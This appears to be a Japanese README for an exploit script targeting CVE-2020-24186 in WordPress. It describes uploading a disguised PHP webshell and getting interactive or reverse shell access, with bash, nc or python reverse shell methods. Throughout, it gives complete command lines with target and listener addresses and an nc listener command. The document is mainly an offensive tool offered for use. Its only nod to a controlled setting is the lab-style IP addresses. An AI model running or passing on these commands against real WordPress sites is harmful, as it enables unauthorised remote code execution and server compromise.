
WordPressのCVE-2020-24186用エクスプロイトスクリプト。偽装されたPHPウェブシェルをアップロードし、インタラクティブまたはリバースシェルアクセスを提供し、オプションでpwntoolsリスナー自動化を備えています。
このスクリプトは、WordPressのCVE-2020-24186脆弱性を悪用して、偽装されたPHPペイロードをアップロードし、対象システムにシェルを取得します。以下の3つの動作モードがあります。
インタラクティブシェル:
基本的なウェブシェルをアップロードし、インタラクティブモードに入ります。これにより、cmdパラメータを通じてコマンドを送信できます。
手動リバースシェル:
ウェブシェルをアップロードし、リバースシェルペイロードを送信しますが、自動的にはリスナーを起動しません。指定したIPとポートで、自分で手動でリスナーを起動する必要があります。
pwntoolsを使用したリバースシェル:
ウェブシェルをアップロードし、リバースシェルペイロードを送信します。スクリプトがpwntoolsを使用して自動的にリスナーを起動し、リバース接続を取得します。
requestspwn (pwntools)--url: 対象サイトのベースURL(例:http://10.10.110.119)。--blogpath: 投稿へのパス(デフォルト:/?page=1)。--mode: 動作モード。interactive または reverse。--lhost: リバースシェル用のローカルIP(reverseモードで必須)。--lport: リバースシェル用のローカルポート(reverseモードで必須)。--reverse_method: リバースシェルの方法:bash、nc、またはpython(デフォルトはbash)。--manual: reverseモードで使用すると、スクリプトはリスナーを起動しません。自分で手動でリスナーを起動する必要があります。--use-proxy: 設定すると、リクエストが設定されたプロキシ経由で送信されます。ウェブシェルをアップロードし、インタラクティブセッションを開始してコマンドを送信します。
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
ウェブシェルをアップロードし、リバースシェルペイロードを送信しますが、自動的にはリスナーを起動しません。自分で手動でリスナーを起動してください(例:netcatを使用)。
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
その後、別のターミナルで手動リスナーを起動します。
nc -lvnp 9002
ウェブシェルをアップロードし、リバースシェルペイロードを送信します。スクリプトがpwntoolsを使用して自動的にリスナーを起動し、接続を取得します。
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
スクリプトは10.10.1.1:9002で接続を待機し、接続が確立されるとインタラクティブシェルを提供します。
--php_payloadオプションを使用できます。--use-proxyフラグを使用する場合は、プロキシ設定を再確認してください。